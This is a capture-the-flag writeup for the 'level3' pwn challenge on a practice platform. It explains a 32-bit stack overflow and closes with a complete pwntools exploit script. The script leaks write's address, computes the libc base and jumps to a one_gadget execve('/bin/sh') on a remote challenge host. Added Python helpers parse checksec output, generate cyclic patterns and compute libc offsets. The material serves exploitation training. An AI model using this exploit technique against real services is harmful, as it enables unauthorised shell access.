Preface
There was still one problem left in the pwn beginner area, this level3; I seem to remember not finishing it back then because the remote target would not connect. I also recall that no library was provided at the time; now a libc_32.so.6 is given.
0x00. Checking protections
devil@ubuntu:~/adworld/pwn$ checksec level3
[*] '/home/devil/adworld/pwn/level3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found ; a stack overflow is possible
NX: NX enabled
PIE: No PIE (0x8048000)
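The checksec output above is easy to read by eye for one binary, but when triaging many binaries it helps to parse it and list which mitigations are absent, together with the build flags that would enable them. The following is an added example (not part of the original writeup); it parses pwntools-style `Key: Value` lines from a constructed copy of the output shown above and reports what is missing.

```python
import re

# Constructed sample: the checksec output quoted above, in pwntools'
# "Key:   Value" layout (the note after "No canary found" is not part of it).
CHECKSEC_OUTPUT = """\
[*] '/home/devil/adworld/pwn/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
"""


def parse_checksec(text):
    """Parse pwntools checksec output into a dict: mitigation name -> value string."""
    fields = {}
    for line in text.splitlines():
        # The "[*] '<path>'" banner line does not match; every "Key: Value" line does.
        m = re.match(r"\s*(\w+):\s*(.+?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def missing_mitigations(fields):
    """Return (mitigation, build flag) pairs for every protection not fully enabled.

    The expected value strings are the ones pwntools prints ("Canary found",
    "NX enabled", "PIE enabled", "Full RELRO")."""
    missing = []
    if not fields.get("Stack", "").startswith("Canary found"):
        missing.append(("stack canary", "-fstack-protector-strong"))
    if not fields.get("NX", "").startswith("NX enabled"):
        missing.append(("NX", "-Wl,-z,noexecstack"))
    if not fields.get("PIE", "").startswith("PIE enabled"):
        missing.append(("PIE", "-fPIE -pie"))
    if not fields.get("RELRO", "").startswith("Full RELRO"):
        missing.append(("full RELRO", "-Wl,-z,relro,-z,now"))
    return missing


if __name__ == "__main__":
    fields = parse_checksec(CHECKSEC_OUTPUT)
    for name, flag in missing_mitigations(fields):
        print("missing %-13s -> rebuild with %s" % (name, flag))
```

For level3 this reports the missing canary, PIE and full RELRO; only NX is in place, which is exactly why the writeup has to reuse existing code (ret2libc / one_gadget) rather than run shellcode from the stack.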
0x01. The stack overflow
The read function has an obvious stack overflow, but the binary itself contains no system("/bin/sh"), so the overflow alone cannot get a shell directly.
0x02. one_gadget
Since I learned to use one_gadget, it has worked every time on challenges that provide the libc.
For a hands-on walkthrough of one_gadget, see here.
devil@ubuntu:~/adworld/pwn$ one_gadget libc_32.so.6
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
esi is the GOT address of libc
[esp+0x28] == NULL
0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
esi is the GOT address of libc
[esp+0x2c] == NULL
0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
esi is the GOT address of libc
[esp+0x30] == NULL
0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
esi is the GOT address of libc
[esp+0x34] == NULL
0x5f065 execl("/bin/sh", eax)
constraints:
esi is the GOT address of libc
eax == NULL
0x5f066 execl("/bin/sh", [esp])
constraints:
esi is the GOT address of libc
[esp] == NULL
Use one_gadget to obtain the execve gadget offset:
execve = 0x3a80c
Note:
* cyclic computes that the overflow needs 144 bytes; note that 144 is the distance from the input to esp-4 (padding = 144-4). If junk = "A"*144, the program will crash when the payload runs.
For example:
A: aaaa
B: aaab
C: aaac
D: aaad
cyclic -l aaaa = 4
cyclic -l aaad = 16
144-4 is the distance from the input position to esp
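To make the cyclic arithmetic concrete, here is an added example (my own code, not part of the writeup and not pwntools itself) of how a cyclic pattern is built and searched: a de Bruijn sequence over the lowercase alphabet with 4-byte chunks, the same construction pwntools' `cyclic` uses, so that every 4-byte window occurs at exactly one offset. `cyclic_find` accepts either the 4 characters or the crash-time register value as an integer, decoding it as a little-endian dword. The offsets it returns are those of this implementation's pattern.

```python
import string
import struct
from itertools import islice

ALPHABET = string.ascii_lowercase  # pwntools' default cyclic alphabet
N = 4                               # chunk length: one 32-bit register


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) over `alphabet` (FKM algorithm).

    Every length-n window occurs exactly once, so a 4-byte register value
    read from a crash identifies a unique offset in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)

    def gen(t, p):
        if t > n:
            if n % p == 0:
                for c in a[1:p + 1]:
                    yield alphabet[c]
        else:
            a[t] = a[t - p]
            yield from gen(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from gen(t + 1, t)

    yield from gen(1, 1)


def cyclic(length):
    """First `length` characters of the pattern (what `cyclic <length>` prints)."""
    return "".join(islice(de_bruijn(), length))


def cyclic_find(chunk, max_length=0x10000):
    """Offset of a 4-character chunk in the pattern, or -1 if absent.

    `chunk` may be the 4 characters, or the register value as an integer,
    which is decoded as a little-endian dword (0x61616162 -> "baaa")."""
    if isinstance(chunk, int):
        chunk = struct.pack("<I", chunk).decode()
    return cyclic(max_length).find(chunk)


if __name__ == "__main__":
    print(cyclic(24))
    print(cyclic_find("baaa"), cyclic_find(0x61616162))
    # The chunk that sits at offset 140 is found at 140 again: that is the
    # number of bytes that precede the value landing in the return address.
    print(cyclic_find(cyclic(144)[140:144]))
```

The first 24 characters come out as `aaaabaaacaaadaaaeaaafaaa`, so the 4-byte window `baaa` starts at offset 4: the offset reported is where the overwriting chunk begins, and the padding before the return address is that offset itself.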
0x03. Approach
1. To run the execve gadget, first obtain the libc load offset, which gives execve_addr.
2. Trigger the overflow to run execve and get a shell.
3. Use write(1, addr, 4) to leak the runtime address of write, derive the libc offset from it, and then the execve address.
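Step 3 is a subtraction and an addition, but two things go wrong with it in practice: the leak can arrive with fewer than 4 bytes, and a mismatched libc (wrong version, wrong symbol offset) silently produces a garbage address. The following added example (not from the writeup) carries the calculation through with the 32-bit masking and a page-alignment check that catches most wrong-libc cases; the leaked address and the offset of write within libc are constructed values, while 0x3a80c is the one_gadget offset quoted above.

```python
PAGE = 0x1000
MASK32 = 0xffffffff

# Constructed values for the example. In the real exploit the leak is what
# write(1, write_got, 4) sends back and the symbol offset comes from
# ELF("./libc_32.so.6").symbols['write'].
LIBC_WRITE_OFFSET = 0xd43c0     # constructed: offset of write inside libc
CONSTRUCTED_LEAK = b"\xc0\x43\xe1\xf7"   # constructed: 4 leaked bytes on the wire
ONE_GADGET_OFFSET = 0x3a80c     # the one_gadget offset from the page


def u32(data):
    """Unpack exactly 4 little-endian bytes; a short read must not be silently padded."""
    if len(data) != 4:
        raise ValueError("expected 4 leaked bytes, got %d" % len(data))
    return int.from_bytes(data, "little")


def libc_base(leaked_addr, symbol_offset):
    """Runtime libc base from a leaked function address and that function's offset.

    libc is mmap'ed page-aligned, so a base with low 12 bits set means the
    symbol offset (i.e. the libc build) does not match the remote one."""
    base = (leaked_addr - symbol_offset) & MASK32
    if base % PAGE:
        raise ValueError("libc base 0x%x is not page-aligned: wrong libc or bad leak" % base)
    return base


def resolve(base, offset):
    """Runtime address of an offset inside libc, kept within 32 bits."""
    return (base + offset) & MASK32


def gadget_from_leak(leak_bytes, symbol_offset, gadget_offset):
    """The whole step: bytes on the wire -> libc base -> runtime gadget address."""
    base = libc_base(u32(leak_bytes), symbol_offset)
    return resolve(base, gadget_offset)


if __name__ == "__main__":
    addr = gadget_from_leak(CONSTRUCTED_LEAK, LIBC_WRITE_OFFSET, ONE_GADGET_OFFSET)
    print("one_gadget at 0x%x" % addr)
```

With the constructed values the leak decodes to 0xf7e143c0, the base is 0xf7d40000 and the gadget lands at 0xf7d7a80c; feeding a symbol offset that is off by 4 bytes makes `libc_base` raise instead of returning a plausible-looking but wrong address.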
0x04. exp
from pwn import *
p = remote("111.198.29.45",37840)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")
context(log_level='debug',arch='i386',os='linux')
execve = 0x3a80c # one_gadget offset (execve) inside libc
junk = b"A"*140 # padding up to the saved return address (bytes, so it works on Python 2 and 3)
main_addr = elf.symbols['main']
write_got = elf.got['write']
write_plt = elf.plt['write']
# Stage 1: call write(1, write_got, 4) to leak the runtime address of write, then return to main
payload1 = junk + p32(write_plt) + p32(main_addr)
payload1 += p32(1) + p32(write_got) + p32(4)
p.recv()
p.sendline(payload1)
data = p.recv()[:4]
write_addr = u32(data)
offset = write_addr - libc.symbols['write'] # libc load offset (base)
execve_addr = offset + execve
# Stage 2: overflow again and return into the one_gadget
payload = junk + p32(execve_addr)
p.sendlineafter(b"Input:\n",payload)
p.interactive()